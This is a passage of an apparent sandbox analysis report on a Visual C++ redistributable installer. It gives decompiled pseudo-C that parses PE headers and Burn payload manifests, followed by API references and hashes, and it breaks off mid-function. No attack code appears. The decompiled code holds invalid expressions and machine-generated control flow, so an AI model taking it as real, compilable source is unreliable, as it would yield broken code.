                                                                          				memset( &_v360, 0, _t224 << 2);
                                                                          				_t226 = _a8;
                                                                          				 *_t223 = _t226;
                                                                          				if(_t226 != 0xffffffff) {
                                                                          					_t106 = _a12;
                                                                          					_t247 = SetFilePointerEx;
                                                                          					_push(0);
                                                                          					_t107 =  ==  ? _t226 : _t106;
                                                                          					 *((intOrPtr*)(_t223 + 4)) =  ==  ? _t226 : _t106;
                                                                          					_t108 = SetFilePointerEx(_t226, 0, 0, 0); // executed
                                                                          					if(_t108 != 0) {
                                                                          						_t111 = ReadFile( *_t223,  &_v72, 0x40,  &_v364, 0); // executed
                                                                          						if(_t111 != 0) {
                                                                          							if(_v364 < 0x40) {
                                                                          								L66:
                                                                          								_t247 = 0x8007000d;
                                                                          								_t252 = 0x8007000d;
                                                                          								E000137D3(_t111, "section.cpp", 0x4e, 0x8007000d);
                                                                          								_push("Failed to find valid DOS image header in buffer.");
                                                                          								L67:
                                                                          								_push(_t247);
                                                                          								goto L68;
                                                                          							}
                                                                          							_t111 = 0x5a4d;
                                                                          							if(0x5a4d != _v72) {
                                                                          								goto L66;
                                                                          							}
                                                                          							_push(0);
                                                                          							asm("cdq");
                                                                          							_t117 = SetFilePointerEx( *_t223, _v12.LowPart, _t243, 0); // executed
                                                                          							if(_t117 != 0) {
                                                                          								_t120 = ReadFile( *_t223,  &_v320, 0x18,  &_v364, 0); // executed
                                                                          								if(_t120 != 0) {
                                                                          									if(_v364 < 0x18 || _v320 != 0x4550) {
                                                                          										_t247 = 0x8007000d;
                                                                          										_t252 = 0x8007000d;
                                                                          										E000137D3(_t120, "section.cpp", 0x64, 0x8007000d);
                                                                          										_push("Failed to find valid NT image header in buffer.");
                                                                          										goto L67;
                                                                          									} else {
                                                                          										_t24 = _v12.LowPart + 0x58; // 0x58
                                                                          										_t123 = _v12.LowPart + 0x98;
                                                                          										_v388 = _t24;
                                                                          										_push(0);
                                                                          										_v392.LowPart = _t123;
                                                                          										_t124 = SetFilePointerEx( *_t223, _t123, 0, 0); // executed
                                                                          										if(_t124 != 0) {
                                                                          											if(ReadFile( *_t223,  &_v376, 4,  &_v364, 0) != 0) {
                                                                          												if(ReadFile( *_t223,  &_v380, 4,  &_v364, 0) != 0) {
                                                                          													_push(0);
                                                                          													_t133 = SetFilePointerEx( *_t223, _v12 + (_v300 & 0x0000ffff) + 0x18, 0, 0); // executed
                                                                          													if(_t133 != 0) {
                                                                          														_t247 = 0;
                                                                          														_v384 = 0;
                                                                          														if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
                                                                          															L63:
                                                                          															_t137 = GetLastError();
                                                                          															_t255 =  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
                                                                          															_t252 =  >=  ? 0x80004005 :  <=  ? _t137 : _t137 & 0x0000ffff | 0x80070000;
                                                                          															E000137D3(0x80004005, "section.cpp", 0x8d, _t252);
                                                                          															_push(_t247);
                                                                          															_push("Failed to read image section header, index: %u");
                                                                          															_push(_t252);
                                                                          															L64:
                                                                          															E0005012F();
                                                                          															goto L69;
                                                                          														}
                                                                          														_t237 = 1;
                                                                          														while(_v364 >= 0x28) {
                                                                          															_t142 =  &_v360;
                                                                          															if( *_t142 != 0x7869772e ||  *((intOrPtr*)(_t142 + 4)) != 0x6e727562) {
                                                                          																_t143 = _v314 & 0x0000ffff;
                                                                          																if(_t237 >= (_v314 & 0x0000ffff)) {
                                                                          																	_t248 = 0x8007000d;
                                                                          																	_t252 = 0x8007000d;
                                                                          																	E000137D3(_t143, "section.cpp", 0xa0, 0x8007000d);
                                                                          																	_push("Failed to find Burn section.");
                                                                          																	goto L57;
                                                                          																}
                                                                          																_t247 = _t247 + 1;
                                                                          																_v384 = _t247;
                                                                          																_v372 = _t237 + 1;
                                                                          																if(ReadFile( *_t223,  &_v360, 0x28,  &_v364, 0) == 0) {
                                                                          																	goto L63;
                                                                          																}
                                                                          																_t237 = _v372;
                                                                          																continue;
                                                                          															} else {
                                                                          																if(_v344 >= 0x34) {
                                                                          																	_t247 = E000138D4(_v344, 1);
                                                                          																	_v368 = _t247;
                                                                          																	if(_t247 != 0) {
                                                                          																		_push(0);
                                                                          																		_t151 = SetFilePointerEx( *_t223, _v340.LowPart, 0, 0); // executed
                                                                          																		if(_t151 != 0) {
                                                                          																			_v372 = _v340 + 0x1c;
                                                                          																			if(ReadFile( *_t223, _t247, _v344,  &_v364, 0) != 0) {
                                                                          																				_t156 = _v344;
                                                                          																				if(_v344 <= _v364) {
                                                                          																					if( *((intOrPtr*)(_t247 + 4)) == 2) {
                                                                          																						if(E000548CB(_t237,  *((intOrPtr*)(_t223 + 4)),  &_v400) >= 0) {
                                                                          																							_t243 =  *(_t247 + 0x18);
                                                                          																							 *(_t223 + 8) = _t243;
                                                                          																							if( *((intOrPtr*)(_t247 + 0x20)) == 0) {
                                                                          																								_t241 = _v376;
                                                                          																								if(_t241 == 0) {
                                                                          																									_t160 =  *((intOrPtr*)(_t247 + 0x30)) + _t243;
                                                                          																								} else {
                                                                          																									_t160 = _v380 + _t241;
                                                                          																								}
                                                                          																							} else {
                                                                          																								_t160 =  *((intOrPtr*)(_t247 + 0x24)) +  *((intOrPtr*)(_t247 + 0x20));
                                                                          																							}
                                                                          																							 *((intOrPtr*)(_t223 + 0xc)) = _t160;
                                                                          																							 *((intOrPtr*)(_t223 + 0x10)) = _v400;
                                                                          																							 *((intOrPtr*)(_t223 + 0x14)) = _v396;
                                                                          																							 *((intOrPtr*)(_t223 + 0x18)) = _v388;
                                                                          																							 *(_t223 + 0x1c) = _v392;
                                                                          																							 *((intOrPtr*)(_t223 + 0x20)) = _v372;
                                                                          																							 *((intOrPtr*)(_t223 + 0x24)) =  *((intOrPtr*)(_t247 + 0x1c));
                                                                          																							 *((intOrPtr*)(_t223 + 0x28)) =  *((intOrPtr*)(_t247 + 0x20));
                                                                          																							 *((intOrPtr*)(_t223 + 0x2c)) =  *((intOrPtr*)(_t247 + 0x24));
                                                                          																							 *((intOrPtr*)(_t223 + 0x30)) =  *((intOrPtr*)(_t247 + 0x28));
                                                                          																							 *(_t223 + 0x34) =  *(_t247 + 0x2c);
                                                                          																							_t242 = E000138D4( *(_t247 + 0x2c) << 2, 1);
                                                                          																							 *((intOrPtr*)(_t223 + 0x38)) = _t242;
                                                                          																							if(_t242 != 0) {
                                                                          																								_t93 = _t247 + 0x30; // 0x30
                                                                          																								E0003F0F0(_t242, _t93,  *(_t223 + 0x34) << 2);
                                                                          																								_t94 = _t247 + 8; // 0x8
                                                                          																								_t252 = E0001B106(_t94);
                                                                          																								if(_t252 >= 0) {
                                                                          																									goto L59;
                                                                          																								}
                                                                          																								E000137D3(_t178, "section.cpp", 0xf5, _t252);
                                                                          																								_push("PE Header from file didn\'t match PE Header in memory.");
                                                                          																								L37:
                                                                          																								_push(_t252);
                                                                          																								goto L38;
                                                                          																							} else {
                                                                          																								_t223 = 0x8007000e;
                                                                          																								_t252 = 0x8007000e;
                                                                          																								E000137D3(_t172, "section.cpp", 0xef, 0x8007000e);
                                                                          																								_push("Failed to allocate memory for container sizes.");
                                                                          																								_push(0x8007000e);
                                                                          																								L38:
                                                                          																								E0005012F();
                                                                          																								L58:
                                                                          																								L59:
                                                                          																								if(_t247 != 0) {
                                                                          																									E00013999(_t247);
                                                                          																								}
                                                                          																								goto L69;
                                                                          																							}
                                                                          																						}
                                                                          																						_push("Failed to get total size of bundle.");
                                                                          																						goto L37;
                                                                          																					}
                                                                          																					_t252 = 0x8007000d;
                                                                          																					E000137D3(_t156, "section.cpp", 0xcc, 0x8007000d);
                                                                          																					E0005012F(0x8007000d, "Failed to read section info, unsupported version: %08x", _v368->LowPart.HighPart);
                                                                          																					_t247 = _v368;
                                                                          																					goto L59;
                                                                          																				}
                                                                          																				_t248 = 0x8007000d;
                                                                          																				_t252 = 0x8007000d;
                                                                          																				E000137D3(_t156, "section.cpp", 0xc5, 0x8007000d);
                                                                          																				_push("Failed to read complete section info.");
                                                                          																				L57:
                                                                          																				_push(_t248);
                                                                          																				E0005012F();
                                                                          																				_t247 = _v368;
                                                                          																				goto L58;
                                                                          																			}
                                                                          																			_t188 = GetLastError();
                                                                          																			_t259 =  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
                                                                          																			_t252 =  >=  ? 0x80004005 :  <=  ? _t188 : _t188 & 0x0000ffff | 0x80070000;
                                                                          																			E000137D3(0x80004005, "section.cpp", 0xc0, _t252);
                                                                          																			_push("Failed to read section info.");
                                                                          																			goto L37;
                                                                          																		}
                                                                          																		_t191 = GetLastError();
                                                                          																		_t262 =  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
                                                                          																		_t252 =  >=  ? 0x80004005 :  <=  ? _t191 : _t191 & 0x0000ffff | 0x80070000;
                                                                          																		E000137D3(0x80004005, "section.cpp", 0xb7, _t252);
                                                                          																		_push("Failed to seek to section info.");
                                                                          																		goto L37;
                                                                          																	}
                                                                          																	_t223 = 0x8007000e;
                                                                          																	_t252 = 0x8007000e;
                                                                          																	E000137D3(_t149, "section.cpp", 0xb1, 0x8007000e);
                                                                          																	_push("Failed to allocate buffer for section info.");
                                                                          																	_push(0x8007000e);
                                                                          																	goto L68;
                                                                          																}
                                                                          																_t247 = 0x8007000d;
                                                                          																_t252 = 0x8007000d;
                                                                          																E000137D3(_t142, "section.cpp", 0xac, 0x8007000d);
                                                                          																_push(_v344);
                                                                          																_push("Failed to read section info, data to short: %u");
                                                                          																L62:
                                                                          																_push(_t247);
                                                                          																goto L64;
                                                                          															}
                                                                          														}
                                                                          														_t247 = 0x8007000d;
                                                                          														_t252 = 0x8007000d;
                                                                          														E000137D3(_t136, "section.cpp", 0x92, 0x8007000d);
                                                                          														_push(_v384);
                                                                          														_push("Failed to read complete image section header, index: %u");
                                                                          														goto L62;
                                                                          													}
                                                                          													_t196 = GetLastError();
                                                                          													_t265 =  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
                                                                          													_t252 =  >=  ? 0x80004005 :  <=  ? _t196 : _t196 & 0x0000ffff | 0x80070000;
                                                                          													E000137D3(0x80004005, "section.cpp", 0x84, _t252);
                                                                          													_push("Failed to seek past optional headers.");
                                                                          													goto L2;
                                                                          												}
                                                                          												_t199 = GetLastError();
                                                                          												_t268 =  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
                                                                          												_t252 =  >=  ? 0x80004005 :  <=  ? _t199 : _t199 & 0x0000ffff | 0x80070000;
                                                                          												E000137D3(0x80004005, "section.cpp", 0x79, _t252);
                                                                          												_push("Failed to read signature size.");
                                                                          												goto L2;
                                                                          											}
                                                                          											_t202 = GetLastError();
                                                                          											_t271 =  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
                                                                          											_t252 =  >=  ? 0x80004005 :  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "section.cpp", 0x74, _t252);
                                                                          											_push("Failed to read signature offset.");
                                                                          											goto L2;
                                                                          										}
                                                                          										_t205 = GetLastError();
                                                                          										_t274 =  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
                                                                          										_t252 =  >=  ? 0x80004005 :  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "section.cpp", 0x6f, _t252);
                                                                          										_push("Failed to seek to section info.");
                                                                          										goto L2;
                                                                          									}
                                                                          								}
                                                                          								_t208 = GetLastError();
                                                                          								_t277 =  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
                                                                          								_t252 =  >=  ? 0x80004005 :  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
                                                                          								E000137D3(0x80004005, "section.cpp", 0x5f, _t252);
                                                                          								_push("Failed to read NT header.");
                                                                          								goto L2;
                                                                          							}
                                                                          							_t211 = GetLastError();
                                                                          							_t280 =  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
                                                                          							_t252 =  >=  ? 0x80004005 :  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "section.cpp", 0x59, _t252);
                                                                          							_push("Failed to seek to NT header.");
                                                                          							goto L2;
                                                                          						}
                                                                          						_t214 = GetLastError();
                                                                          						_t283 =  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
                                                                          						_t252 =  >=  ? 0x80004005 :  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "section.cpp", 0x49, _t252);
                                                                          						_push("Failed to read DOS header.");
                                                                          						goto L2;
                                                                          					}
                                                                          					_t217 = GetLastError();
                                                                          					_t286 =  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
                                                                          					_t252 =  >=  ? 0x80004005 :  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "section.cpp", 0x43, _t252);
                                                                          					_push("Failed to seek to start of file.");
                                                                          					goto L2;
                                                                          				} else {
                                                                          					_t220 = GetLastError();
                                                                          					_t289 =  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
                                                                          					_t252 =  >=  ? 0x80004005 :  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "section.cpp", 0x3a, _t252);
                                                                          					_push("Failed to open handle to engine process path.");
                                                                          					L2:
                                                                          					_push(_t252);
                                                                          					L68:
                                                                          					E0005012F();
                                                                          					L69:
                                                                          					return E0003DE36(_t223, _v8 ^ _t290, _t243, _t247, _t252);
                                                                          				}
                                                                          			}
                                                                          0x0001b9c8
                                                                          0x0001b9ca
                                                                          0x0001b9cf
                                                                          0x0001b9d4
                                                                          0x0001b836
                                                                          0x0001b836
                                                                          0x0001ba3f
                                                                          0x0001ba41
                                                                          0x0001ba43
                                                                          0x0001ba4a
                                                                          0x0001ba4a
                                                                          0x00000000
                                                                          0x0001ba43
                                                                          0x0001b9b6
                                                                          0x0001b91f
                                                                          0x00000000
                                                                          0x0001b91f
                                                                          0x0001b8e1
                                                                          0x0001b8e3
                                                                          0x0001b8f7
                                                                          0x0001b8fc
                                                                          0x00000000
                                                                          0x0001b902
                                                                          0x0001b8aa
                                                                          0x0001b8ba
                                                                          0x0001b8bc
                                                                          0x0001b8c1
                                                                          0x0001ba33
                                                                          0x0001ba33
                                                                          0x0001ba34
                                                                          0x0001ba39
                                                                          0x00000000
                                                                          0x0001ba39
                                                                          0x0001b867
                                                                          0x0001b878
                                                                          0x0001b882
                                                                          0x0001b890
                                                                          0x0001b895
                                                                          0x00000000
                                                                          0x0001b895
                                                                          0x0001b802
                                                                          0x0001b813
                                                                          0x0001b81d
                                                                          0x0001b82b
                                                                          0x0001b830
                                                                          0x00000000
                                                                          0x0001b830
                                                                          0x0001b7c9
                                                                          0x0001b7d9
                                                                          0x0001b7db
                                                                          0x0001b7e0
                                                                          0x0001b7e5
                                                                          0x00000000
                                                                          0x0001b7e5
                                                                          0x0001b789
                                                                          0x0001b799
                                                                          0x0001b79b
                                                                          0x0001b7a0
                                                                          0x0001b7a6
                                                                          0x0001ba76
                                                                          0x0001ba76
                                                                          0x00000000
                                                                          0x0001ba76
                                                                          0x0001b732
                                                                          0x0001ba54
                                                                          0x0001ba64
                                                                          0x0001ba66
                                                                          0x0001ba6b
                                                                          0x0001ba71
                                                                          0x00000000
                                                                          0x0001ba71
                                                                          0x0001b6b9
                                                                          0x0001b6ca
                                                                          0x0001b6d4
                                                                          0x0001b6e2
                                                                          0x0001b6e7
                                                                          0x00000000
                                                                          0x0001b6e7
                                                                          0x0001b667
                                                                          0x0001b678
                                                                          0x0001b682
                                                                          0x0001b68d
                                                                          0x0001b692
                                                                          0x00000000
                                                                          0x0001b692
                                                                          0x0001b618
                                                                          0x0001b629
                                                                          0x0001b633
                                                                          0x0001b63e
                                                                          0x0001b643
                                                                          0x00000000
                                                                          0x0001b643
                                                                          0x0001b5c9
                                                                          0x0001b5da
                                                                          0x0001b5e4
                                                                          0x0001b5ef
                                                                          0x0001b5f4
                                                                          0x00000000
                                                                          0x0001b5f4
                                                                          0x0001b58e
                                                                          0x0001b552
                                                                          0x0001b563
                                                                          0x0001b56d
                                                                          0x0001b578
                                                                          0x0001b57d
                                                                          0x00000000
                                                                          0x0001b57d
                                                                          0x0001b503
                                                                          0x0001b514
                                                                          0x0001b51e
                                                                          0x0001b529
                                                                          0x0001b52e
                                                                          0x00000000
                                                                          0x0001b52e
                                                                          0x0001b4a0
                                                                          0x0001b4b1
                                                                          0x0001b4bb
                                                                          0x0001b4c6
                                                                          0x0001b4cb
                                                                          0x00000000
                                                                          0x0001b4cb
                                                                          0x0001b452
                                                                          0x0001b463
                                                                          0x0001b46d
                                                                          0x0001b478
                                                                          0x0001b47d
                                                                          0x00000000
                                                                          0x0001b3ff
                                                                          0x0001b3ff
                                                                          0x0001b410
                                                                          0x0001b41a
                                                                          0x0001b425
                                                                          0x0001b42a
                                                                          0x0001b42f
                                                                          0x0001b42f
                                                                          0x0001baed
                                                                          0x0001baed
                                                                          0x0001baf4
                                                                          0x0001bb06
                                                                          0x0001bb06

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 0001B3FF
                                                                          • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B44C
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 0001B452
                                                                          • ReadFile.KERNELBASE(00000000,0001435C,00000040,?,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B49A
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 0001B4A0
                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B4FD
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B503
                                                                          • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B54C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B552
                                                                          • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B5C3
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B5C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$Pointer$Read
                                                                          • String ID: ($.wix$4$@Met$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                          • API String ID: 2600052162-807742151
                                                                          • Opcode ID: b4685404a93aef9ca5662f3ca8ab24c0a884becce16d6f2b1946e0ab6efaabd5
                                                                          • Instruction ID: e8b0278f7de57455254e731c4de73bae9a5145eaec978a3245cc921182038642
                                                                          • Opcode Fuzzy Hash: b4685404a93aef9ca5662f3ca8ab24c0a884becce16d6f2b1946e0ab6efaabd5
                                                                          • Instruction Fuzzy Hash: C312C271A40325ABEB349A65CC86FFB76E8EF04701F004165FE09EB181DB749E85CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 71%
                                                                          			E0001CCB6(void* __ebx, void* __edi, signed int* _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				signed int _v16;
                                                                          				signed int _v20;
                                                                          				intOrPtr* _t92;
                                                                          				signed int _t94;
                                                                          				signed int _t102;
                                                                          				signed int _t103;
                                                                          				int _t112;
                                                                          				int _t113;
                                                                          				int _t114;
                                                                          				signed int _t136;
                                                                          				signed int _t150;
                                                                          				signed int* _t157;
                                                                          				signed int _t160;
                                                                          				signed int _t161;
                                                                          				signed int* _t162;
                                                                          				signed int _t165;
                                                                          				void* _t175;
                                                                          				signed int _t176;
                                                                          
                                                                          				_v20 = _v20 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v16 = _v16 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t176 = E00053803(_a16, L"Payload",  &_v20);
                                                                          				if(_t176 >= 0) {
                                                                          					_t92 = _v20;
                                                                          					_t176 =  *((intOrPtr*)( *_t92 + 0x20))(_t92,  &_v16);
                                                                          					__eflags = _t176;
                                                                          					if(_t176 >= 0) {
                                                                          						_t94 = _v16;
                                                                          						__eflags = _t94;
                                                                          						if(_t94 != 0) {
                                                                          							_t102 = E000138D4(_t94 * 0x58, 1);
                                                                          							_t157 = _a4;
                                                                          							 *_t157 = _t102;
                                                                          							__eflags = _t102;
                                                                          							if(_t102 != 0) {
                                                                          								_t103 = _v16;
                                                                          								_a16 = _a16 & 0x00000000;
                                                                          								_t157[1] = _t103;
                                                                          								__eflags = _t103;
                                                                          								if(_t103 == 0) {
                                                                          									L50:
                                                                          									_t176 = 0;
                                                                          									__eflags = 0;
                                                                          								} else {
                                                                          									_t162 = 0;
                                                                          									__eflags = 0;
                                                                          									_a4 = 0;
                                                                          									while(1) {
                                                                          										_t175 = _t162 +  *_t157;
                                                                          										_t176 = E00053760(_t162, _v20,  &_v12, 0);
                                                                          										__eflags = _t176;
                                                                          										if(_t176 < 0) {
                                                                          											break;
                                                                          										}
                                                                          										_t176 = E000531C7(_v12, L"Id", _t175);
                                                                          										__eflags = _t176;
                                                                          										if(_t176 < 0) {
                                                                          											_push("Failed to get @Id.");
                                                                          											goto L81;
                                                                          										} else {
                                                                          											_t24 = _t175 + 0x18; // 0x15355
                                                                          											_t176 = E000531C7(_v12, L"FilePath", _t24);
                                                                          											__eflags = _t176;
                                                                          											if(_t176 < 0) {
                                                                          												_push("Failed to get @FilePath.");
                                                                          												goto L81;
                                                                          											} else {
                                                                          												_t176 = E000531C7(_v12, L"Packaging",  &_v8);
                                                                          												__eflags = _t176;
                                                                          												if(_t176 < 0) {
                                                                          													_push("Failed to get @Packaging.");
                                                                          													goto L81;
                                                                          												} else {
                                                                          													_t112 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"download", 0xffffffff);
                                                                          													__eflags = _t112 - 2;
                                                                          													if(_t112 != 2) {
                                                                          														_t113 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"embedded", 0xffffffff);
                                                                          														__eflags = _t113 - 2;
                                                                          														if(_t113 != 2) {
                                                                          															_t114 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"external", 0xffffffff);
                                                                          															__eflags = _t114 - 2;
                                                                          															if(_t114 != 2) {
                                                                          																_push(_v8);
                                                                          																_t176 = 0x80070057;
                                                                          																_push("Invalid value for @Packaging: %ls");
                                                                          																goto L76;
                                                                          															} else {
                                                                          																 *(_t175 + 4) = 3;
                                                                          																goto L20;
                                                                          															}
                                                                          														} else {
                                                                          															 *(_t175 + 4) = _t113;
                                                                          															goto L20;
                                                                          														}
                                                                          													} else {
                                                                          														 *(_t175 + 4) = 1;
                                                                          														L20:
                                                                          														__eflags = _a8;
                                                                          														if(_a8 == 0) {
                                                                          															L25:
                                                                          															_t41 = _t175 + 8; // 0x15345
                                                                          															_t176 = E000533DB(_t162, _v12, L"LayoutOnly", _t41);
                                                                          															__eflags = _t176 - 0x80070490;
                                                                          															if(_t176 == 0x80070490) {
                                                                          																L27:
                                                                          																_t43 = _t175 + 0x38; // 0x15375
                                                                          																_t176 = E000531C7(_v12, L"SourcePath", _t43);
                                                                          																__eflags = _t176 - 0x80070490;
                                                                          																if(_t176 != 0x80070490) {
                                                                          																	L29:
                                                                          																	__eflags = _t176;
                                                                          																	if(_t176 < 0) {
                                                                          																		_push("Failed to get @SourcePath.");
                                                                          																		goto L81;
                                                                          																	} else {
                                                                          																		goto L30;
                                                                          																	}
                                                                          																} else {
                                                                          																	__eflags =  *(_t175 + 4) - 1;
                                                                          																	if( *(_t175 + 4) == 1) {
                                                                          																		L30:
                                                                          																		_t46 = _t175 + 0x40; // 0x1537d
                                                                          																		_t176 = E000531C7(_v12, L"DownloadUrl", _t46);
                                                                          																		__eflags = _t176 - 0x80070490;
                                                                          																		if(_t176 != 0x80070490) {
                                                                          																			L32:
                                                                          																			__eflags = _t176;
                                                                          																			if(_t176 < 0) {
                                                                          																				_push("Failed to get @DownloadUrl.");
                                                                          																				goto L81;
                                                                          																			} else {
                                                                          																				goto L33;
                                                                          																			}
                                                                          																		} else {
                                                                          																			__eflags =  *(_t175 + 4) - 1;
                                                                          																			if( *(_t175 + 4) != 1) {
                                                                          																				L33:
                                                                          																				_t176 = E000531C7(_v12, L"FileSize",  &_v8);
                                                                          																				__eflags = _t176 - 0x80070490;
                                                                          																				if(_t176 == 0x80070490) {
                                                                          																					L36:
                                                                          																					_t176 = E000531C7(_v12, L"CertificateRootPublicKeyIdentifier",  &_v8);
                                                                          																					__eflags = _t176 - 0x80070490;
                                                                          																					if(_t176 == 0x80070490) {
                                                                          																						L39:
                                                                          																						_t176 = E000531C7(_v12, L"CertificateRootThumbprint",  &_v8);
                                                                          																						__eflags = _t176 - 0x80070490;
                                                                          																						if(_t176 == 0x80070490) {
                                                                          																							L42:
                                                                          																							_t176 = E000531C7(_v12, L"Hash",  &_v8);
                                                                          																							__eflags = _t176;
                                                                          																							if(__eflags < 0) {
                                                                          																								_push("Failed to get @Hash.");
                                                                          																								goto L81;
                                                                          																							} else {
                                                                          																								_t65 = _t175 + 0x34; // 0x15371
                                                                          																								_t66 = _t175 + 0x30; // 0x1536d
                                                                          																								_t176 = E0001200B(_t162, __eflags, _v8, _t66, _t65);
                                                                          																								__eflags = _t176;
                                                                          																								if(_t176 < 0) {
                                                                          																									_push("Failed to hex decode the Payload/@Hash.");
                                                                          																									goto L81;
                                                                          																								} else {
                                                                          																									_t176 = E000531C7(_v12, L"Catalog",  &_v8);
                                                                          																									__eflags = _t176 - 0x80070490;
                                                                          																									if(_t176 == 0x80070490) {
                                                                          																										L47:
                                                                          																										_t165 = _v12;
                                                                          																										__eflags = _t165;
                                                                          																										if(_t165 != 0) {
                                                                          																											 *((intOrPtr*)( *_t165 + 8))(_t165);
                                                                          																											_t75 =  &_v12;
                                                                          																											 *_t75 = _v12 & 0x00000000;
                                                                          																											__eflags =  *_t75;
                                                                          																										}
                                                                          																										_t136 = _a16 + 1;
                                                                          																										_t162 =  &(_a4[0x16]);
                                                                          																										_a16 = _t136;
                                                                          																										_a4 = _t162;
                                                                          																										__eflags = _t136 - _v16;
                                                                          																										if(_t136 < _v16) {
                                                                          																											continue;
                                                                          																										} else {
                                                                          																											goto L50;
                                                                          																										}
                                                                          																									} else {
                                                                          																										__eflags = _t176;
                                                                          																										if(_t176 < 0) {
                                                                          																											_push("Failed to get @Catalog.");
                                                                          																											goto L81;
                                                                          																										} else {
                                                                          																											_t70 = _t175 + 0x1c; // 0x15359
                                                                          																											_t176 = E0001C780(_t162, _a12, _v8, _t70);
                                                                          																											__eflags = _t176;
                                                                          																											if(_t176 < 0) {
                                                                          																												_push("Failed to find catalog.");
                                                                          																												goto L81;
                                                                          																											} else {
                                                                          																												goto L47;
                                                                          																											}
                                                                          																										}
                                                                          																									}
                                                                          																								}
                                                                          																							}
                                                                          																						} else {
                                                                          																							__eflags = _t176;
                                                                          																							if(__eflags < 0) {
                                                                          																								_push("Failed to get @CertificateRootThumbprint.");
                                                                          																								goto L81;
                                                                          																							} else {
                                                                          																								_t60 = _t175 + 0x2c; // 0x15369
                                                                          																								_t61 = _t175 + 0x28; // 0x15365
                                                                          																								_t176 = E0001200B(_t162, __eflags, _v8, _t61, _t60);
                                                                          																								__eflags = _t176;
                                                                          																								if(_t176 < 0) {
                                                                          																									_push("Failed to hex decode @CertificateRootThumbprint.");
                                                                          																									goto L81;
                                                                          																								} else {
                                                                          																									goto L42;
                                                                          																								}
                                                                          																							}
                                                                          																						}
                                                                          																					} else {
                                                                          																						__eflags = _t176;
                                                                          																						if(__eflags < 0) {
                                                                          																							_push("Failed to get @CertificateRootPublicKeyIdentifier.");
                                                                          																							goto L81;
                                                                          																						} else {
                                                                          																							_t55 = _t175 + 0x24; // 0x15361
                                                                          																							_t56 = _t175 + 0x20; // 0x1535d
                                                                          																							_t176 = E0001200B(_t162, __eflags, _v8, _t56, _t55);
                                                                          																							__eflags = _t176;
                                                                          																							if(_t176 < 0) {
